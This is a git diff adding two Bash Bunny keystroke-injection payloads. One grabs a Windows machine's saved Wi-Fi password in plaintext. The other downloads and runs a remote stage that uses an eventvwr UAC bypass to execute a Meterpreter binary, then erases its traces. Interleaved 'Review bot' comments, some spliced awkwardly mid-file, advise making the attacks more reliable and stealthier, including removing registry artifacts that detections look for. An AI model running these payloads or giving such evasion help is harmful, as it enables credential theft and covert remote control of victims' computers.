diff --git a/payloads/library/WifiGrabber/ducky_script.txt b/payloads/library/WifiGrabber/ducky_script.txt
new file mode 100755
index 00000000..c85f3586
--- /dev/null
+++ b/payloads/library/WifiGrabber/ducky_script.txt
@@ -0,0 +1,69 @@
+REM Title: WiFi password grabber for the bash bunny
+REM Author: Silvian
+REM Props: Siem, Darren Kitchen
+REM Version: 1
+REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell Start-Process cmd -Verb runAs
+ENTER
+DELAY 2000
+LEFT
+DELAY 1000
+ENTER
+DELAY 1000
+
+REM Delete registry keys storing Run dialog history
+STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+ENTER
+
+REM --> Getting SSID
+STRING cd "%TEMP%" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
+ENTER
+
+REM --> Creating A.txt
+STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
+ENTER
+
+REM --> Get network type
+STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
+ENTER
+
+REM --> Get authentication
+STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
+ENTER
+
+REM --> Get password
+STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
+ENTER
+
+REM --> Delete A.txt
+STRING del A.txt
+ENTER
+
+REM --> Create Log.txt
+STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
+ENTER
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. 
%COMPUTERNAME%, %date% and %time% pretty obvious
+STRING for /f %D in ('wmic volume get DriveLetter^, Label ^| find "BashBunny"') do set usb=%D
+ENTER
+DELAY 200
+ENTER
+
+REM Create directory on the bash bunny as wifi creds and computer name and date time stamp
+STRING set dst=%usb%\loot\WiFi_Creds\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+ENTER
+DELAY 200
+ENTER
+STRING mkdir %dst% >>nul
+ENTER
+
+REM Move the Log.txt to the created directory on the bash bunny
+STRING move Log.txt %dst% >>nul
+ENTER
+DELAY 100
+STRING exit
+ENTER
diff --git a/payloads/library/WifiGrabber/payload.txt b/payloads/library/WifiGrabber/payload.txt
new file mode 100755
index 00000000..e5e9158a
--- /dev/null
+++ b/payloads/library/WifiGrabber/payload.txt
@@ -0,0 +1,38 @@
+#!/bin/bash
+
+# @title: WiFi Windows password grabber for the bash bunny
+# @author: Silvian Dragan
+# @props: Siem, Darren Kitchen
+# @version: 1.0
+# @target: Windows 7 (not tested for 8 and above)
+#
+#
+# @details: This is a simple Wifi password grabber tested and working for Windows 7
+# However this has not been tested on Windows 8 and above and any suggestions and
+# improvements are greatly welcomed. Powershell scripting isn't higest skill so
+# I'm sure I'll have much to learn.
+#
+#
+# Colors:
+# Purple: starts the attack payload
+# Green: successful execution
+# Red: failure to load dependency ducky script
+#
+
+
+ATTACKMODE HID STORAGE
+
+LED R B 200
+
+LANGUAGE=‘us’
+
+source bunny_helpers.sh
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
+    QUACK ${SWITCH_POSITION}/ducky_script.txt
+    LED G
+else
+    LED R
+    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
+    exit 1
+fi
diff --git a/payloads/library/WifiGrabber/readme.md b/payloads/library/WifiGrabber/readme.md
new file mode 100644
index 00000000..4e175cd8
--- /dev/null
+++ b/payloads/library/WifiGrabber/readme.md
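Review bot: The SSID capture in the `REM --> Getting SSID` line splits on `delims=: ` with a space, so a profile name containing a space is cut to its first word and the following `netsh wlan show profiles %A% key=clear` queries the wrong profile, leaving A.txt and the password fields empty. Take the remainder of the line and strip its single leading space instead: `for /f "tokens=1* delims=:" %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%B`, then `set A=%A:~1%`, and quote the name in the lookup, `netsh wlan show profiles name="%A%" key=clear`. If the `wmic volume` lookup for the BashBunny label finds nothing, `%usb%` expands empty and `mkdir %dst%` / `move Log.txt %dst%` leave the plaintext key under `\loot\WiFi_Creds\...` on the target's current drive rather than on the device, so a guard such as `if not defined usb exit` before the `set dst=` line would keep the loot off the victim. The `%date:~...%` / `%time:~...%` slicing also presumes one particular locale format, which is worth stating in the header comment.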
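Review bot: `LANGUAGE=‘us’` in the new payload.txt is written with typographic quotes (U+2018/U+2019), so bash assigns the literal five-character string `‘us’` rather than `us`; whatever bunny_helpers.sh or QUACK does with that value will presumably not resolve to the `us` keyboard map, and the sibling WindowsMeterpreterStaged/payload.txt shows the intended form, `LANGUAGE='us'`. The existence test uses the absolute `/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt` while QUACK is handed the relative `${SWITCH_POSITION}/ducky_script.txt`; if QUACK resolves relative to the payloads directory that is consistent, but a one-line comment saying so would save the next reader a lookup. `${SWITCH_POSITION}` is also unquoted in the QUACK call; `QUACK "${SWITCH_POSITION}/ducky_script.txt"` is the safe form.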
@@ -0,0 +1,24 @@
+# Windows Wifi Credentials Grabber
+
+* Author: Silvian
+* Version: Version 1.0
+* Target: Windows 7 (not tested on Windows 8 and above)
+
+## Description
+
+This is a simple Wifi password grabber tested and working for Windows 7
+However this has not been tested on Windows 8 and above and any suggestions and
+improvements are greatly welcomed. Powershell scripting isn't higest skill so
+I'm sure I'll have much to learn from sharing this code with everyone. :)
+
+## Dependencies
+
+Everything is included - no extra dependencies needed to run this payload.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Purple | Starts the attack payload |
+| Green | successful execution |
+| Red | failure to load dependency ducky script |
diff --git a/payloads/library/WindowsMeterpreterStaged/payload.txt b/payloads/library/WindowsMeterpreterStaged/payload.txt
new file mode 100755
index 00000000..2621808c
--- /dev/null
+++ b/payloads/library/WindowsMeterpreterStaged/payload.txt
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# @title: Bash bunny Windows staged meterpreter payload
+# @author: Silvian Dragan
+# @props: Darren Kitchen, Mubix
+# @version: 1.0
+# @target: Windows 7 8, 8.1 and 10.
+#
+#
+# @details: This is an a advanced meterpreter staged payload injection using the
+# rubber ducky capabilites of the bash bunny to call a powershell script referred
+# to sc.txt which must be hosted on a remote server.
+# This script then downloads the update.exe which is also hosted on
+# a remote host, and then executes it on the target machine.
+# note it will also attempt to clean up any registry footprint from the run command.
+# Once the bash bunny is initialized the script should not take more than
+# 2-3 sec to execute.
+#
+# @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
+# replace the 127.0.0.1 with your own host and also feel free to change the name
+# of either sc.txt or update.exe to names of your choosing.
+# You must also generate the appropariate update.exe payload using msfvenom for
+# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
+# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
+#
+# Colors:
+# Amber: starts the attack payload
+# Green: successful execution
+# Red: failure to load dependency ducky script
+#
+
+
+ATTACKMODE HID
+
+LED R G 200
+
+LANGUAGE='us'
+
+source bunny_helpers.sh
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
+    QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
+    LED G
+else
+    LED R
+    echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
+    exit 1
+fi
diff --git a/payloads/library/WindowsMeterpreterStaged/readme.md b/payloads/library/WindowsMeterpreterStaged/readme.md
new file mode 100644
index 00000000..b60b7980
--- /dev/null
+++ b/payloads/library/WindowsMeterpreterStaged/readme.md
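Review bot: The dependency check in the new `if` tests for `ducky.txt`, but the QUACK line loads `windows-staged-meterpreter.txt`, the file this commit actually adds, so the payload either goes red because no `ducky.txt` exists or, if some stray `ducky.txt` happens to be present, passes the check and then QUACKs a file it never verified. Test the file that is used: `if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/windows-staged-meterpreter.txt" ]; then` and `QUACK "${SWITCH_POSITION}/windows-staged-meterpreter.txt"`. The message on the else branch also carries a typo, `dwindows-staged-meterpreter.txt`, which will mislead anyone grepping debuglog.txt for the real filename. The `@target` line claims Windows 7 through 10, but the header gives no indication that the eventvwr/mscfile elevation path in sc.txt was checked on 10, so a hedged note there ("elevation step verified on … only") would be more honest.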
@@ -0,0 +1,32 @@
+# Windows Meterpreter staged payload
+
+* Author: Silvian
+* Version: Version 1.0
+* Target: Windows 7, 8, 8.1, 10
+
+## Description
+
+This is an a advanced meterpreter staged payload injection using the
+rubber ducky capabilites of the bash bunny to call a powershell script referred
+to sc.txt which must be hosted on a remote server.
+This script then downloads the update.exe which is also hosted on
+a remote host, and then executes it on the target machine.
+Note it will also attempt to clean up any registry footprint from the run command.
+Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.
+
+## Dependencies
+
+you must have sc.txt and update.exe hosted on a remote server.
+replace the 127.0.0.1 with your own host and also feel free to change the name
+of either sc.txt or update.exe to names of your choosing.
+You must also generate the appropariate update.exe payload using msfvenom for
+windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
+tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Amber | Executin Payload |
+| Green | Attack Finished |
+| Red | Failed to load dependencies |
diff --git a/payloads/library/WindowsMeterpreterStaged/sc.txt b/payloads/library/WindowsMeterpreterStaged/sc.txt
new file mode 100644
index 00000000..65173b7a
--- /dev/null
+++ b/payloads/library/WindowsMeterpreterStaged/sc.txt
@@ -0,0 +1,30 @@ +Sub Main() + 'Download File + CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true + 'Set new zoneId + CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true + 'Write UAC bypass regkey + CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ" + 'Trigger UAC bypass + CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true + 'Reset regkey + GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" + 'Remove this script + + CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False +End Sub +'Dont wanna display shit +On Error Resume Next + + Main + + + If Err.Number Then + + 'on error cleanup and exit + + CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False + + WScript.Quit 4711 + +End If diff --git a/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt b/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt new file mode 100755 index 00000000..225ebb7d --- /dev/null +++ b/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt @@ -0,0 +1,7 @@ +REM change 127.0.0.1 to the IP address or host name of your own host service + +DELAY 1000 +GUI r +DELAY 100 +STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs +ENTER
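Review bot: The `'Reset regkey` step only deletes the default value under `HKCU\Software\Classes\mscfile\shell\open\command`, so the `mscfile\shell\open\command` key chain created by `RegWrite` stays in the user's hive — exactly the artifact that eventvwr/mscfile elevation detections look for — and the comment's promise of a reset is not met. Delete the keys innermost-first (both StdRegProv.DeleteKey and WshShell.RegDelete refuse a key that still has subkeys, as far as I recall), and note that because `On Error Resume Next` precedes `Main`, a failed download currently leaves the hijack value in place since the error path only self-deletes. Two points to hedge rather than fix here: `Run("eventvwr.exe"),0,true` blocks until eventvwr exits, so if `update.exe` keeps mmc alive the script may never reach its cleanup or self-delete; and `update.exe` arrives over plain HTTP from a hard-coded host with no hash or signature check, so anyone on the path can substitute the binary that is then run elevated — at minimum say so in a comment, or fetch over HTTPS and compare a known hash before the `RegWrite`. Both `Main` and the trailing error handler are fully inside the hunk.
```vbscript
    'Reset regkey: remove the whole hijack chain, innermost key first
    Set sh = CreateObject("WScript.Shell")
    sh.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
    sh.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
    sh.RegDelete "HKCU\Software\Classes\mscfile\shell\"
    sh.RegDelete "HKCU\Software\Classes\mscfile\"
    ' ... unchanged: self-delete of this script ...
```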
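Review bot: The Run-dialog one-liner (`powershell -windowstyle hidden ... %temp%/update.vbs`) is typed straight into `GUI r`, which records the command in `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, yet nothing in this hunk or in sc.txt removes that entry, so the "clean up any registry footprint from the run command" promise in the payload header and readme is not kept. The sibling WifiGrabber ducky script shows the pattern, `REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f`, which could presumably be appended to the same PowerShell line after a `;` or added to sc.txt's cleanup. The stage is fetched over plain `http://` and written to the fixed path `%temp%/update.vbs`, so a comment noting the on-path substitution risk and the predictable filename would help operators, and `%temp%` expanding to a path with spaces may break the bare `%temp%/update.vbs` invocation — `& "$env:TEMP\update.vbs"` is the robust form. The `DELAY 100` after `GUI r` may also be too short on slower hosts; the WifiGrabber script waits 1000 ms at the same point.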